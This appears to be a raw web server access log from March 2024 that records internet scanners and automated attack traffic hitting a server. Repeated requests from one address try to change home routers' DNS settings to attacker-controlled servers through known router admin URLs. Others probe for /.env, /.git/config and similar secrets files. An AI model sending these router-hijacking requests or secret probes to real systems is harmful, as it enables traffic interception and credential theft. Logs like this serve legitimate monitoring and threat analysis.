209.141.42.209 - - [07/Mar/2024:01:32:21 +0100] "GET /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=91.202.5.121&dnsSecondary=91.202.5.120&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP HTTP/1.1" 404 317 "http://212.91.246.86:80" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:01:32:21 +0100] "POST /goform/setSysTools HTTP/1.1" 404 323 "http://212.91.246.86:80" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:01:32:21 +0100] "dnscfg.cgi?dnsPrimary=91.202.5.121&dnsSecondary=91.202.5.120&dnsIfcsList=&dnsRefresh=1&sessionKey=1830278854 HTTP/1.1" 400 329 "-" "-"
43.155.183.138 - - [07/Mar/2024:01:38:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
45.128.232.191 - - [07/Mar/2024:01:40:26 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
146.19.24.28 - - [07/Mar/2024:01:43:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
209.141.42.209 - - [07/Mar/2024:01:45:53 +0100] "GET /dnscfg.cgi?dnsPrimary=91.202.5.121&dnsSecondary=91.202.5.120&dnsDynamic=0&dnsRefresh=1&dnsIfcsList= HTTP/1.1" 404 315 "http://212.91.246.80:80" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:01:45:53 +0100] "GET /userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.0.100&ip2=192.168.0.199&Lease=120&domain=&dnsserver=91.202.5.121&dnsserver2=91.202.5.120&Save=Save HTTP/1.1" 404 333 "http://212.91.246.80:80/userRpm/LanDhcpServerRpm.htm" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:01:45:53 +0100] "GET /userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver=91.202.5.121&dnsserver2=91.202.5.120&Save=Save HTTP/1.1" 404 335 "http://212.91.246.80:80/userRpm/WanDynamicIpCfgRpm.htm?wan=0" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:01:45:53 +0100] "GET /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=91.202.5.121&dnsSecondary=91.202.5.120&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP HTTP/1.1" 404 317 "http://212.91.246.80:80" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:01:45:53 +0100] "POST /goform/setSysTools HTTP/1.1" 404 323 "http://212.91.246.80:80" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:01:45:53 +0100] "dnscfg.cgi?dnsPrimary=91.202.5.121&dnsSecondary=91.202.5.120&dnsIfcsList=&dnsRefresh=1&sessionKey=1830278854 HTTP/1.1" 400 329 "-" "-"
103.183.121.244 - - [07/Mar/2024:01:50:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
185.165.169.131 - - [07/Mar/2024:01:54:36 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "fasthttp"
103.183.121.244 - - [07/Mar/2024:01:57:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
216.218.206.69 - - [07/Mar/2024:02:00:38 +0100] "\x16\x03\x01" 501 318 "-" "-"
216.218.206.66 - - [07/Mar/2024:02:01:47 +0100] "\x16\x03\x01" 501 318 "-" "-"
184.105.139.67 - - [07/Mar/2024:02:01:59 +0100] "\x16\x03\x01" 501 318 "-" "-"
146.19.24.28 - - [07/Mar/2024:02:02:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.128.232.191 - - [07/Mar/2024:02:02:30 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.165.169.131 - - [07/Mar/2024:02:10:49 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "fasthttp"
185.165.169.131 - - [07/Mar/2024:02:12:42 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "fasthttp"
146.19.24.28 - - [07/Mar/2024:02:14:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.128.232.191 - - [07/Mar/2024:02:20:16 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
167.94.138.33 - - [07/Mar/2024:02:21:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.33 - - [07/Mar/2024:02:21:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.33 - - [07/Mar/2024:02:21:27 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.33 - - [07/Mar/2024:02:21:27 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
79.124.59.230 - - [07/Mar/2024:02:24:43 +0100] "\x16\x03\x01\x01\xc0\x01" 501 321 "-" "-"
94.156.66.125 - - [07/Mar/2024:02:43:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
52.226.166.103 - - [07/Mar/2024:02:43:09 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.1"
52.226.166.103 - - [07/Mar/2024:02:43:09 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0"
52.226.166.103 - - [07/Mar/2024:02:43:09 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15"
103.183.121.244 - - [07/Mar/2024:02:50:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
94.156.66.125 - - [07/Mar/2024:02:50:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
205.210.31.3 - - [07/Mar/2024:02:50:44 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.165.169.131 - - [07/Mar/2024:02:52:45 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "fasthttp"
45.128.232.191 - - [07/Mar/2024:02:52:55 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
209.141.42.209 - - [07/Mar/2024:02:54:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
94.156.66.125 - - [07/Mar/2024:02:56:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
35.216.188.224 - - [07/Mar/2024:02:56:07 +0100] "\x16\x03\x01" 501 318 "-" "-"
35.216.188.224 - - [07/Mar/2024:02:56:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
35.216.188.224 - - [07/Mar/2024:02:56:07 +0100] "HELP" 501 319 "-" "-"
35.216.188.224 - - [07/Mar/2024:02:56:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "abuse.xmco.fr"
35.216.188.224 - - [07/Mar/2024:02:56:07 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr" 224.188.216.35.bc.googleusercontent.com - - [07/Mar/2024:02:56:07 +0100] "GET /server-status HTTP/1.1" 403 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.188.224 - - [07/Mar/2024:02:56:07 +0100] "GET /config.json HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.188.224 - - [07/Mar/2024:02:56:07 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.188.224 - - [07/Mar/2024:02:56:07 +0100] "GET /telescope/requests HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.188.224 - - [07/Mar/2024:02:56:07 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
44.220.188.184 - - [07/Mar/2024:02:58:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/58.0.3055.103 Safari/537.32"
205.210.31.103 - - [07/Mar/2024:02:59:32 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
167.250.140.169 - - [07/Mar/2024:02:59:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
79.124.59.230 - - [07/Mar/2024:03:03:01 +0100] "\x16\x03\x01\x01\xc0\x01" 501 321 "-" "-"
70.34.220.160 - - [07/Mar/2024:03:04:07 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
185.165.169.131 - - [07/Mar/2024:03:08:22 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "fasthttp"
45.128.232.191 - - [07/Mar/2024:03:08:49 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.118.53.50 - - [07/Mar/2024:03:10:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.53.50 - - [07/Mar/2024:03:10:00 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.79.181.104 - - [07/Mar/2024:03:10:09 +0100] "\x16\x03\x01" 501 318 "-" "-"
66.175.213.4 - - [07/Mar/2024:03:12:00 +0100] "\x16\x03\x01" 501 318 "-" "-"
66.175.213.4 - - [07/Mar/2024:03:13:33 +0100] "\x16\x03\x01" 501 318 "-" "-"
146.19.24.28 - - [07/Mar/2024:03:13:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [07/Mar/2024:03:14:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [07/Mar/2024:03:16:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.33.80.243 - - [07/Mar/2024:03:17:00 +0100] "\x16\x03\x01" 501 318 "-" "-"
172.104.11.4 - - [07/Mar/2024:03:18:15 +0100] "\x16\x03\x01" 501 318 "-" "-"
45.79.181.251 - - [07/Mar/2024:03:19:22 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.199.114.28 - - [07/Mar/2024:03:21:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.114.28 - - [07/Mar/2024:03:21:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.114.28 - - [07/Mar/2024:03:21:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
146.19.24.28 - - [07/Mar/2024:03:22:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
198.199.114.28 - - [07/Mar/2024:03:22:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.114.28 - - [07/Mar/2024:03:22:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.114.28 - - [07/Mar/2024:03:22:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.114.28 - - [07/Mar/2024:03:22:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
167.248.133.126 - - [07/Mar/2024:03:22:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.126 - - [07/Mar/2024:03:22:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.126 - - [07/Mar/2024:03:22:59 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.126 - - [07/Mar/2024:03:23:00 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
198.199.114.28 - - [07/Mar/2024:03:23:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.114.28 - - [07/Mar/2024:03:23:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.114.28 - - [07/Mar/2024:03:23:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
146.19.24.28 - - [07/Mar/2024:03:28:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
182.181.253.208 - - [07/Mar/2024:03:29:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
185.191.126.213 - - [07/Mar/2024:03:29:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [07/Mar/2024:03:31:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [07/Mar/2024:03:31:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [07/Mar/2024:03:31:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.128.232.191 - - [07/Mar/2024:03:32:17 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.191.126.213 - - [07/Mar/2024:03:33:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [07/Mar/2024:03:34:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [07/Mar/2024:03:37:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.216.150.86 - - [07/Mar/2024:03:37:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
146.19.24.28 - - [07/Mar/2024:03:41:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
35.216.188.224 - - [07/Mar/2024:03:41:35 +0100] "\x16\x03\x01" 501 318 "-" "-"
35.216.188.224 - - [07/Mar/2024:03:41:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
35.216.188.224 - - [07/Mar/2024:03:41:35 +0100] "HELP" 501 319 "-" "-"
35.216.188.224 - - [07/Mar/2024:03:41:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "abuse.xmco.fr" 224.188.216.35.bc.googleusercontent.com - - [07/Mar/2024:03:41:35 +0100] "GET /server-status HTTP/1.1" 403 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.188.224 - - [07/Mar/2024:03:41:36 +0100] "GET /config.json HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.188.224 - - [07/Mar/2024:03:41:36 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.188.224 - - [07/Mar/2024:03:41:36 +0100] "GET /telescope/requests HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.188.224 - - [07/Mar/2024:03:41:36 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.188.224 - - [07/Mar/2024:03:41:36 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
34.76.158.233 - - [07/Mar/2024:03:42:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
98.96.193.34 - - [07/Mar/2024:03:42:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
98.96.193.34 - - [07/Mar/2024:03:42:40 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
34.78.6.216 - - [07/Mar/2024:03:44:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
5.196.102.69 - - [07/Mar/2024:03:44:34 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
34.77.127.183 - - [07/Mar/2024:03:45:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
146.19.24.28 - - [07/Mar/2024:03:45:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
35.195.93.98 - - [07/Mar/2024:03:46:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
146.19.24.28 - - [07/Mar/2024:03:46:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
35.195.93.98 - - [07/Mar/2024:03:47:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
35.203.210.136 - - [07/Mar/2024:03:49:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
34.76.96.55 - - [07/Mar/2024:03:49:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
34.76.96.55 - - [07/Mar/2024:03:49:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
34.79.162.186 - - [07/Mar/2024:03:50:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
185.191.126.213 - - [07/Mar/2024:03:51:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
34.76.96.55 - - [07/Mar/2024:03:51:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
209.141.42.209 - - [07/Mar/2024:03:54:14 +0100] "GET /dnscfg.cgi?dnsPrimary=91.202.5.121&dnsSecondary=91.202.5.120&dnsDynamic=0&dnsRefresh=1&dnsIfcsList= HTTP/1.1" 404 315 "http://212.91.246.82:80" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:03:54:14 +0100] "GET /userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.0.100&ip2=192.168.0.199&Lease=120&domain=&dnsserver=91.202.5.121&dnsserver2=91.202.5.120&Save=Save HTTP/1.1" 404 333 "http://212.91.246.82:80/userRpm/LanDhcpServerRpm.htm" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:03:54:14 +0100] "GET /userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver=91.202.5.121&dnsserver2=91.202.5.120&Save=Save HTTP/1.1" 404 335 "http://212.91.246.82:80/userRpm/WanDynamicIpCfgRpm.htm?wan=0" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:03:54:14 +0100] "GET /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=91.202.5.121&dnsSecondary=91.202.5.120&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP HTTP/1.1" 404 317 "http://212.91.246.82:80" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:03:54:14 +0100] "POST /goform/setSysTools HTTP/1.1" 404 323 "http://212.91.246.82:80" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:03:54:14 +0100] "dnscfg.cgi?dnsPrimary=91.202.5.121&dnsSecondary=91.202.5.120&dnsIfcsList=&dnsRefresh=1&sessionKey=1830278854 HTTP/1.1" 400 329 "-" "-"
185.180.143.50 - - [07/Mar/2024:03:58:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.50 - - [07/Mar/2024:03:58:06 +0100] "GET /ext-js/app/common/zld_product_spec.js HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.191.126.213 - - [07/Mar/2024:03:59:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [07/Mar/2024:04:02:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
209.141.42.209 - - [07/Mar/2024:04:02:36 +0100] "GET /dnscfg.cgi?dnsPrimary=91.202.5.121&dnsSecondary=91.202.5.120&dnsDynamic=0&dnsRefresh=1&dnsIfcsList= HTTP/1.1" 404 315 "http://212.91.246.88:80" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:04:02:36 +0100] "GET /userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.0.100&ip2=192.168.0.199&Lease=120&domain=&dnsserver=91.202.5.121&dnsserver2=91.202.5.120&Save=Save HTTP/1.1" 404 333 "http://212.91.246.88:80/userRpm/LanDhcpServerRpm.htm" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:04:02:36 +0100] "GET /userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver=91.202.5.121&dnsserver2=91.202.5.120&Save=Save HTTP/1.1" 404 335 "http://212.91.246.88:80/userRpm/WanDynamicIpCfgRpm.htm?wan=0" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:04:02:36 +0100] "GET /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=91.202.5.121&dnsSecondary=91.202.5.120&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP HTTP/1.1" 404 317 "http://212.91.246.88:80" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:04:02:36 +0100] "POST /goform/setSysTools HTTP/1.1" 404 323 "http://212.91.246.88:80" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:04:02:36 +0100] "dnscfg.cgi?dnsPrimary=91.202.5.121&dnsSecondary=91.202.5.120&dnsIfcsList=&dnsRefresh=1&sessionKey=1830278854 HTTP/1.1" 400 329 "-" "-"
185.191.126.213 - - [07/Mar/2024:04:06:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [07/Mar/2024:04:21:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
198.235.24.102 - - [07/Mar/2024:04:28:12 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.102 - - [07/Mar/2024:04:28:13 +0100] "\x16\x03\x01" 501 318 "-" "-"
45.128.232.191 - - [07/Mar/2024:04:28:56 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
209.141.42.209 - - [07/Mar/2024:04:29:16 +0100] "GET /dnscfg.cgi?dnsPrimary=91.202.5.121&dnsSecondary=91.202.5.120&dnsDynamic=0&dnsRefresh=1&dnsIfcsList= HTTP/1.1" 404 315 "http://212.91.246.81:80" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:04:29:16 +0100] "GET /userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.0.100&ip2=192.168.0.199&Lease=120&domain=&dnsserver=91.202.5.121&dnsserver2=91.202.5.120&Save=Save HTTP/1.1" 404 333 "http://212.91.246.81:80/userRpm/LanDhcpServerRpm.htm" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:04:29:16 +0100] "GET /userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver=91.202.5.121&dnsserver2=91.202.5.120&Save=Save HTTP/1.1" 404 335 "http://212.91.246.81:80/userRpm/WanDynamicIpCfgRpm.htm?wan=0" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:04:29:16 +0100] "GET /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=91.202.5.121&dnsSecondary=91.202.5.120&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP HTTP/1.1" 404 317 "http://212.91.246.81:80" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:04:29:16 +0100] "POST /goform/setSysTools HTTP/1.1" 404 323 "http://212.91.246.81:80" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
